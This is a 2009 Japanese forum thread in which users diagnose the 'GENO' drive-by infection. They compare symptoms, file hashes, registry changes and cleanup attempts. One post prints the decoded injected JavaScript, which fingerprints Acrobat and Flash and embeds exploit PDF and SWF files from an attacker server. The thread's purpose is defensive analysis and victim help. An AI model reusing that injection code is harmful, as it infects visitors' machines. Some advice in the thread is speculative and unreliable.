09/04/08 18:35:31
AMD64のCPUに替えれば無問題
51:名無しさん@お腹いっぱい。
09/04/08 18:38:00
- Files Created:
C:\bgrn.mym
C:\u.bat
- Files Read:
C:\WINDOWS\system32\sqlsodbc.chm
- Files Modified:
C:\WINDOWS\system32\sqlsodbc.chm
C:\bgrn.mym
C:\u.bat
- Files Deleted:
C:\_.t
C:\u.bat
52:名無しさん@お腹いっぱい。
09/04/08 18:38:01
CVE-2009-0119だったりして
53:名無しさん@お腹いっぱい。
09/04/08 18:44:24
>>47
ウチの環境じゃ
・IEが死にまくる
・OEが死にまくる
・cmd.exeが起動しない
っていう症状が出てる。
54:名無しさん@お腹いっぱい。
09/04/08 18:44:43
hxxp://94.247.2.195/news/index.php
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="URLリンク(94.247.2.195)" width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="URLリンク(94.247.2.195)"/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="URLリンク(94.247.2.195)"/></embed></object>');document.write("</div>");
55:名無しさん@お腹いっぱい。
09/04/08 18:47:03
>>53
windows update繋がります?
56:54
09/04/08 18:47:23
↑リンク外すの忘れてました;;
57:名無しさん@お腹いっぱい。
09/04/08 18:48:43
>>55
繋がったような希ガス
今当該機器はオフラインなので確認できない
ただシステムログにWindowsアップデート関連のエラーが一件出てた
58:名無しさん@お腹いっぱい。
09/04/08 18:49:05
オイオイ
59:名無しさん@お腹いっぱい。
09/04/08 18:58:44
いろいろExplorer.exe壊したw
60:名無しさん@お腹いっぱい。
09/04/08 19:04:21
la.exeを実行したら
sqlsodbc.chm
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
を書き換えるよとcomodoさんが言った
61:名無しさん@お腹いっぱい。
09/04/08 19:06:39
WikiのKaspersky、Nortonで駆除で来たってネタだろw
バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして
スキャンかけたけど問題のjsファイルしか引っかからなかったぞw
当然症状は治らず
つまりアンチウイルスは役に立たない
必死にオンラインスキャンしてるくらいだったらリカバリーするべき
62:名無しさん@お腹いっぱい。
09/04/08 19:14:26
カスペのオンラインスキャンをやろうと思ったのですが、
アプリケーションのデジタル証明にエラーがあります。~
と出るのですが、気にせず実行してよいものなのでしょうか?
それとも皆様はこの表示出ません?
63:名無しさん@お腹いっぱい。
09/04/08 19:14:54
自作PC板
【馬鹿】GENOを語るスレ23【ID版に移動】
スレリンク(jisaku板)l50
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
スレリンク(jisaku板)l50
64:名無しさん@お腹いっぱい。
09/04/08 19:15:08
Windows NT
( ゚Д゚)ポカーン
65:名無しさん@お腹いっぱい。
09/04/08 19:17:37
>>52
マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性
問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。
66:名無しさん@お腹いっぱい。
09/04/08 19:21:42
>>64
67:名無しさん@お腹いっぱい。
09/04/08 19:34:11
>>60
で、実害は?
68:名無しさん@お腹いっぱい。
09/04/08 19:35:55
今のところの感染確認方法は「sqlsodbc.chm」のタイムスタンプが最近だったらm9(^Д^)
古かったら⊂(^ω^)⊃セフセフ か
69:名無しさん@お腹いっぱい。
09/04/08 19:37:09
未だ修正が行われない crestronjapan.com だが、ヘッダにこんなんあった。
<meta name="generator" content="Movable Type Open Source 4.12" />
70:名無しさん@お腹いっぱい。
09/04/08 19:37:40
現状
>>47みたいな症状が確認されてる?のかな
特定のサイトに繋がらないってのが味噌なのかもしれん
71:名無しさん@お腹いっぱい。
09/04/08 20:09:37
なるほど、メモリ上のexeだけ書き換えられるのね。
72:名無しさん@お腹いっぱい。
09/04/08 20:09:52
>>70
【ウイルス感染】GENOを語るスレ30【アクセス注意】
スレリンク(pc板)
887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。
結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。
で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。
また追って人柱ってみます。。
889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。
今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe
おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。
ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。
73:名無しさん@お腹いっぱい。
09/04/08 20:09:57
>>69
ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?
74:名無しさん@お腹いっぱい。
09/04/08 20:12:37
>>68
少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。
ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。
75:名無しさん@お腹いっぱい。
09/04/08 20:15:30
>>69
なんかOSやHTTP鯖の種類もバラバラだけど、
CMSの種類までバラバラなのか。
Genoは確かWordPressだったでしょ。
76:名無しさん@お腹いっぱい。
09/04/08 20:23:20
上のと動作が微妙に違うみたい
URLリンク(anubis.iseclab.org)
77:名無しさん@お腹いっぱい。
09/04/08 20:26:48
>>75
進入経路が確定しないってのもヤだよな。
URLリンク(www3.atword.jp)
ここで紹介されてるパターンだと、FTPのパスワードが盗まれた(簡単過ぎた?)ことが
原因らしいが・・・・・。
未だサイトを閉じないパピーヌと日本クレストロンはどう対処する気なんだ。
クレストロンは鯖が米国にあるっぽいので向こうの営業時間(明日未明)にならんと
対策されん希ガス。
78:名無しさん@お腹いっぱい。
09/04/08 20:29:05
>>74
踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。
chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。
79:名無しさん@お腹いっぱい。
09/04/08 20:34:05
だからメモ帳起動するとnotepad.exeが変な動きしたりしてたのか。
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は>>71か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ
80:名無しさん@お腹いっぱい。
09/04/08 20:36:12
>>77
もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。
あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。
いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。
81:60
09/04/08 20:41:52
アスロンでデータ実行防止してるPCのvirtualPC上のXPsp2で実行ね
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも)
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
は
\??\C:\_.t
になってた
sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。
タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10
そのまま再起動するも異常に時間がかかるので電源off
セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま
そのままsqlsodbc.chmを踏んでみたけど
mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。
とダイアログが出るだけ
あとはわからん
82:名無しさん@お腹いっぱい。
09/04/08 20:44:46
>>80
一応海外にも被害は出てて拡散しているらしい
日本人は英語のスパムにはそうそう釣られないと思うんだよなあ
こんなのがあった
URLリンク(www3.atword.jp)
83:名無しさん@お腹いっぱい。
09/04/08 20:46:56
>>81
CHMファイルのタイムスタンプはオリジナルのままなのか。。。
84:名無しさん@お腹いっぱい。
09/04/08 20:50:17
>>81
VPC動作したのか・・・orz
感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)
85:名無しさん@お腹いっぱい。
09/04/08 20:50:24
>>82
そこはさっき目を通したわ。
リンクが紫だw
昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
86:名無しさん@お腹いっぱい。
09/04/08 20:51:23
>>84
sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。
87:84
09/04/08 20:52:01
VPC上で動作したのか・・・orz
に訂正・・・
88:名無しさん@お腹いっぱい。
09/04/08 20:52:09
GENOウイルスが世界デビューしてる
89:名無しさん@お腹いっぱい。
09/04/08 20:59:27
これ拡大すんの?
90:名無しさん@お腹いっぱい。
09/04/08 20:59:56
件のサイト群は見てないのに、Wikiに書いてあるcmd.exeが勝手に動いてて
メモリを消費してるという感染済みっぽい挙動を確認したんだけど
やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。
暫くはまともにネット見れなさそうね。
91:名無しさん@お腹いっぱい。
09/04/08 21:00:22
>>84
だね>ハッシュ値
92:名無しさん@お腹いっぱい。
09/04/08 21:01:32
>>89
少しずつ改竄報告増えてるね。
もしリカバリしてもまたほかで踏みそうなきもする。
93:名無しさん@お腹いっぱい。
09/04/08 21:03:18
詳細が分かるまでVMで大人しくネットするしかないな
94:84
09/04/08 21:06:31
だれかハッシュ値確認お願いしませう
95:名無しさん@お腹いっぱい。
09/04/08 21:12:38
>>84
同じ
96:名無しさん@お腹いっぱい。
09/04/08 21:12:58
>>94
MD5 (sqlsodbc.chm) = f639afde02547603a3d3930ee4bf8c12
XP,SP3
97:名無しさん@お腹いっぱい。
09/04/08 21:13:16
もとからsqlsodbc.chmなんてファイルがないんだが・・・
98:名無しさん@お腹いっぱい。
09/04/08 21:14:03
>>84
XP SP3
タイムスタンプが2004/08/05 21:00だが、ハッシュは同じ
99:名無しさん@お腹いっぱい。
09/04/08 21:14:30
>>84
無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。
一致してる。詳細は↓の通り。
ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。
sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト
作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00
CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12
100:名無しさん@お腹いっぱい。
09/04/08 21:21:23
踏んでウイルス食らった後に、検出できるのか?
他スレで完全スルーしたって話でてるな・・
101:名無しさん@お腹いっぱい。
09/04/08 21:21:29
と思ったらちゃんとあったw
f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm
102:名無しさん@お腹いっぱい。
09/04/08 21:27:32
adobeサイトでフラッシュとリーダーを更新しようとしたら
IE7がフリーズするんだけど感染してるのかな?
sqlsodbc.chmのハッシュは
f639afde02547603a3d3930ee4bf8c12 なんだけど・・・
103: ◆N9P3SuvBPo
09/04/08 21:29:08
>99
特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。
104:名無しさん@お腹いっぱい。
09/04/08 21:35:17
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
105:名無しさん@お腹いっぱい。
09/04/08 21:45:48
VISTAは感染しないって本当なの?
106:名無しさん@お腹いっぱい。
09/04/08 21:49:46
>>105
だからまだウィルスの全貌が解明すらされていないのに
「○○なら大丈夫」っていう安易は発想はしないほうがいいよ。
無闇に怯えるのもアフォだけど、やたらに過信するのもヴァカだと思う。
107:名無しさん@お腹いっぱい。
09/04/08 21:57:33
GENOウイルスはなかった
108:名無しさん@お腹いっぱい。
09/04/08 21:57:59
>>90
Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします
もしくは他のウィルスに感染してたかです
109:名無しさん@お腹いっぱい。
09/04/08 21:59:26
>>105
Genoの場合はUserAgentで振り分けがあって
Vistaは対象外っぽかった
気まぐれかもしれないので確実に安全とはいえない
110:名無しさん@お腹いっぱい。
09/04/08 22:03:14
URLリンク(news.goo.ne.jp)
PC通販サイト「GENO」のサイトに改ざんの疑い
INTERNET Watch2009年4月8日(水)00:30
111:名無しさん@お腹いっぱい。
09/04/08 22:06:22
>>105
こういう話もあるよ。
スレリンク(news4vip板:448番)
448 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 20:05:12.93 ID:jaXpHGCM0
まぁかなり話題になってるから知ってるだろうけど
アドビ9.0以前の脆弱性を付いたウイルスだから、今のうちに
更新しとけ
ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
鬱陶しさ(おそらくウイルスの仕様)
vistaならセーフって解釈は間違いで、vistaでも更新かけてない奴はアウト
ソースは昨年11月から未更新の俺のvista
112:名無しさん@お腹いっぱい。
09/04/08 22:11:52
>>108
騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん
avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…
あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5 F639AFDE02547603A3D3930EE4BF8C12
113:名無しさん@お腹いっぱい。
09/04/08 22:12:00
84と同じなら99%感染してないと思う
GENO含めその他のサイトで同ウイルスの感染実験したが
必ずsqlsodbcは改変された
亜種にすぐに変わるようなウイルスじゃなさそうだし、
有効な確認手段だと思う
感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)
114:名無しさん@お腹いっぱい。
09/04/08 22:14:58
今調べたんですが、ハッシュってソフト入れてそれで見るんですよね?
初心者質問本当に申し訳ない。
115:名無しさん@お腹いっぱい。
09/04/08 22:17:52
>>111
あー 感染してたっぽいなぁ俺w
>ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
ちなみにシステムの復元でそれはなくなった。
感染の兆候も見られない。
116:名無しさん@お腹いっぱい。
09/04/08 22:24:34
>>114
有名どころだと↓をインスコするとか。。。
外人さんが作った物だけど日本語表示化だから。
HashTab Shell Extension
URLリンク(www.forest.impress.co.jp)
作者サイト
URLリンク(beeblebrox.org)
117:名無しさん@お腹いっぱい。
09/04/08 22:27:40
>>116
ありがとうございます
118:名無しさん@お腹いっぱい。
09/04/08 22:27:56
UACあるのにVistaが感染するわけないだろjk
119:名無しさん@お腹いっぱい。
09/04/08 22:31:15
あきらめてクリンインストします・・・
120:名無しさん@お腹いっぱい。
09/04/08 22:34:30
sqlsodbc.chmがないんだけど・・・
121:名無しさん@お腹いっぱい。
09/04/08 22:36:06
感染してないのはここら辺の問題かと
URLリンク(www.atmarkit.co.jp)
122:名無しさん@お腹いっぱい。
09/04/08 22:37:30
クリーンインスコする前にcombofix使えよ
123:名無しさん@お腹いっぱい。
09/04/08 22:48:39
combofix使っても無駄だろ・・・・・
124:名無しさん@お腹いっぱい。
09/04/08 22:53:47
>>84
うちのは
CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3
と出ているのですけどこれは改変されていないのでしょうか?
125:名無しさん@お腹いっぱい。
09/04/08 22:54:41
>>124
大文字小文字の差異はあれ一致だね
126::名無しさん@お腹いっぱい
09/04/08 22:55:06
IEやFirefoxが不安定、regedit起動不可等
trojan.killAV に感染してた、ノートン試用版にて駆除
今のところおかしな動きなしです。
127:名無しさん@お腹いっぱい。
09/04/08 22:55:27
>>125
ありがとうございます。
128:名無しさん@お腹いっぱい。
09/04/08 22:56:58
感染した人のsqlsodbc.chmはやっぱり全然違うんかな
129:名無しさん@お腹いっぱい。
09/04/08 22:59:04
ノートンは対応したのか、NODはまだだよな?
130:11
09/04/08 23:05:27
sqlsodbc.chmの場所は
c:\windows\system32\sqlsodbc.chm
です。
Vistaであるかは後で確認する。
ComboFixは場合によってはログインできなくなるかも。
2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後
ログインできなくなった。
2回目はセーフモードで試し、無事ログインもできたけど処理数0
(つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず)
ComboFixを試すのはいいけどやるんだったらセーフモードで、
ログインできなくなるリスクもあるから自己責任で。。。
(ログインできなくなると、リカバリーCDからしかリカバリできないから
注意)
131:名無しさん@お腹いっぱい。
09/04/08 23:07:21
ビスタも感染するんですよね?しないって言ってる人もいるけど
132:名無しさん@お腹いっぱい。
09/04/08 23:07:55
申し訳ありませんが
sqlsodbc.chm
と
sqlsodbc
は同一の扱いなのでしょうか?
133:名無しさん@お腹いっぱい。
09/04/08 23:08:48
>>131
する
>>132
拡張子表示させれ
134:名無しさん@お腹いっぱい。
09/04/08 23:17:14
>>132
sqlsodbcというファイル名は一つしかないから
同じ。
拡張子を表示する設定
URLリンク(www.cdwavmp3.com)
135:名無しさん@お腹いっぱい。
09/04/08 23:18:51
UACあってもVistaで感染するの?そのためのUACだと思ってたんだが
ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして
136:名無しさん@お腹いっぱい。
09/04/08 23:20:40
>>135
vistaで踏んだあとxpで再び踏んだら多分アウト
137:名無しさん@お腹いっぱい。
09/04/08 23:21:14
>>1
>WINDOWSの正規ファイルを上書き(?)する可能性大
この時点でUAC発動してバレバレだしな
138:名無しさん@お腹いっぱい。
09/04/08 23:24:16
>>133>>134
申し訳ありませんでした
139:名無しさん@お腹いっぱい。
09/04/08 23:25:57
GENOウイルススレ
スレリンク(sec板)
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
スレリンク(news板)
【新種ウイルス】GENOを語るスレ31【無料配布中】
スレリンク(pc板)
【ウイルス】GENOを語るスレ31【完治】
スレリンク(pc板)
【8BOAA】 GENOを語るスレ26 【zif付き】
スレリンク(notepc板)
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
スレリンク(jisaku板)
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
スレリンク(sec2chd板)
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
スレリンク(pcnews板)
PC通販サイト「GENO」のサイトに改ざんの疑い
スレリンク(news板)
140:名無しさん@お腹いっぱい。
09/04/08 23:26:11
UACあってもUserが許可しちゃえば感染するだろ
もう一回感染実験してくるノシ
141:名無しさん@お腹いっぱい。
09/04/08 23:27:39
CRCは家の環境でも上のやつで一致でした。
142:名無しさん@お腹いっぱい。
09/04/08 23:30:31
旧プログラムw
143:名無しさん@お腹いっぱい。
09/04/08 23:34:20
XPでもDEP有効にしてれば防げるのか?
144:名無しさん@お腹いっぱい。
09/04/08 23:42:46
XPsp2なんだけど、
sqlsodbc.chm
C:\WINDOWS\system32
1.29 KB (1,323 バイト)
MD5:BF7209B9589AD09A25740F6D47D0ADEA
CRC32:7585CBB6
SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
ファイルサイズからして全然違う。
アウトかね
145:名無しさん@お腹いっぱい。
09/04/08 23:43:04
>>143
まだわかんない。
ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。
それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。
146:名無しさん@お腹いっぱい。
09/04/08 23:43:45
>>144
おそらくそれはご愁傷様コース。
多分確実に食らってる。
147:名無しさん@お腹いっぱい。
09/04/08 23:44:23
>>144
PC挙動もおかしいですか?
148:名無しさん@お腹いっぱい。
09/04/08 23:48:43
>144
タ、タイムスタンプは?タイムスタンプは変わったの?
149:名無しさん@お腹いっぱい。
09/04/08 23:48:53
>147
2日前、
WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。
IEとプニルがすぐ落ちる等、挙動がおかしかったんで、
avast入れてスキャンするも何も検出されず。
システムの復元は普通にブラウジング出来たんで、
クリンインスコせずに今に至る。
面倒くさがらずにクリンインスコするか
150:名無しさん@お腹いっぱい。
09/04/08 23:49:04
sqlsodbc.chmの
更新日時が1年前だったが、これは大丈夫かな?
151:名無しさん@お腹いっぱい。
09/04/08 23:52:41
>>149
㌧
残念ながらアウツですな
152:名無しさん@お腹いっぱい。
09/04/08 23:53:07
>148
作成日時:2005年3月29日、17:20:39
更新日時:2007年4月17日、0:53:08
153:名無しさん@お腹いっぱい。
09/04/08 23:53:31
>>150
今すぐファイルサイズ確認しれw
154:名無しさん@お腹いっぱい。
09/04/08 23:58:49
>>152
重要な情報だわ。
なんかそのハンパな日時が肝なのかもね。
基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。
155:名無しさん@お腹いっぱい。
09/04/08 23:59:32
>>153
作成日時2009年4月1日、21:20:18
更新日時2008年4月14日、21:00:00
50,727 バイト
156:名無しさん@お腹いっぱい。
09/04/09 00:03:39
avastで踏むも更新前だったのでスルー
その後a-squadで検出・削除
readerは8.14、フラッシュは最新だったと思う
不気味な事に不審な挙動全く無し・異常なし・・・
これってもうゾンビにされてる?
157:名無しさん@お腹いっぱい。
09/04/09 00:05:55
>>156
a-squadだと踏んだ後でも検出されるんだ、ヨカタ。
一度踏んだとなると怖いね。
今話題のsqlsodbc.chmも調べてみれば?
といっても感染したのは確定してるのか
158:名無しさん@お腹いっぱい。
09/04/09 00:06:13
>>155
>>92
セーフっぽいね
159:144
09/04/09 00:06:39
人柱となった代わりに、
踏み台にされると実際どんな被害があるのか教えてくれないか?
とりあえず、すぐにでも再インスコした方がいいよね…
160:名無しさん@お腹いっぱい。
09/04/09 00:07:14
えと、最近使ったファイルに最近使った試しのないファイルがどんどん出ているけど
まさかこれ暴れだしたってことだろうか
161:名無しさん@お腹いっぱい。
09/04/09 00:07:24
>>99ダタ
162:名無しさん@お腹いっぱい。
09/04/09 00:08:56
数回にわたる作業の末やっとましな結果が出た。
Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成
で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離
再起動後、レジストリエディタ起動、特定のサイト
(bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、
ブラウザ安定でかなりいい結果じゃないかと。
bxatg.mnnの検体は可否スレに報告しておきます。
で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗
一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを
ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。
二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・
三回目(今回)再びセーフモードで以上の結果でした。
もうちょっと検証必要っぽいので"ComboFixを過信"しないように
またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm
は今のところ実害なし(?)この改変されたやつのハッシュは
ae325e35760718d46bcebc4ad5fab953
163:名無しさん@お腹いっぱい。
09/04/09 00:09:06
>>158
よかった!ありがとう!
でも不思議なことにantivirが定期的にバックドアーを検出するんだよ
これとはまた別の何かかもしれないが
164:名無しさん@お腹いっぱい。
09/04/09 00:11:14
>>163
俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる
165:名無しさん@お腹いっぱい。
09/04/09 00:12:37
>>159への害はPC激重、キーロガーでこれから打つキー情報抜かれるかもetc.。
でも最インスコすれば失った時間と消すことになるデータ以外は解決
ほっといた場合>>159のパソコン経由で悪さされるかも
166:名無しさん@お腹いっぱい。
09/04/09 00:12:40
c:\windows\system32\sqlsodbc.chm
のsqlsodbc.chmが見つからない!
osはXP sp3 何かソフトいれないとだめなの?
167:名無しさん@お腹いっぱい。
09/04/09 00:12:56
>>159
リカバリは当然したほうがいいでそ。
実際何送信してるのかは未確定なのかな。
>>160
ファイル名うpればみんなの助けになるかも
168:名無しさん@お腹いっぱい。
09/04/09 00:15:19
>>159
このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。
あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。
それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。
とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。
169:名無しさん@お腹いっぱい。
09/04/09 00:15:40
>165
再インスコ前に、
専ブラのログ、各種アプリ設定ファイル、エロ画像
諸々バックアップしときたいんだけど、
それにもウィルスくっ付いてくる可能性はある?
170:名無しさん@お腹いっぱい。
09/04/09 00:15:46
俺のsqlsodbcは更新が2002年8月31日、21:00:00だぜ
ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど
誰か同じ人いる?
171:162
09/04/09 00:19:10
sqlsodbc.chmは
サイズ 1,323バイト
ディスク上のサイズが 4,096バイト
172:名無しさん@お腹いっぱい。
09/04/09 00:20:38
>>171
作成日時と更新日時は?
>>152さんと一緒?
173:名無しさん@お腹いっぱい。
09/04/09 00:21:11
>>167
今のところだいぶ前に落としたり自分で作ったファイルなどが最近アクセスされた扱いになってる
今のところ更新はされていないようだけどこの先はどうなるかわからない
174:名無しさん@お腹いっぱい。
09/04/09 00:21:34
>>157
作成日時 2006年3月2日、21:00:00
更新日時 2006年3月2日、21:00:00
ハッシュ:F639AFDE02547603A3D3930EE4BF8C12
175:名無しさん@お腹いっぱい。
09/04/09 00:22:34
>>148
イサキを思い出す。
人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。
他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。
sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。
176:名無しさん@お腹いっぱい。
09/04/09 00:23:00
有名な店だから決行感染してるんじゃないか
感染にすら気づいてない奴がほとんどだと思う
177:名無しさん@お腹いっぱい。
09/04/09 00:25:27
>>169
各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい
このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を
ありきたりの事しかいえなくてすまないね
178:名無しさん@お腹いっぱい。
09/04/09 00:26:42
流れをまとめるとこんな感じであってるだろうか
URLリンク(www29.atwiki.jp)
179:名無しさん@お腹いっぱい。
09/04/09 00:27:27
>>175
間違いなく感染してるよそれw
数回実験したけどまったく同じ症状でた。
断言する、絶対GENOウイルスに感染してるw
180:名無しさん@お腹いっぱい。
09/04/09 00:27:38
ちょ、パピーヌとクレストロンジャパンはまだサイト閉じてないのかw
181:144
09/04/09 00:27:54
>175
今履歴見てみたら、
BAT.trojanってのがあった。
ノートン先生が遮断してくれたみたいで、
tempフォルダから見つかってる。
182:名無しさん@お腹いっぱい。
09/04/09 00:28:50
>>179
デスヨネーw
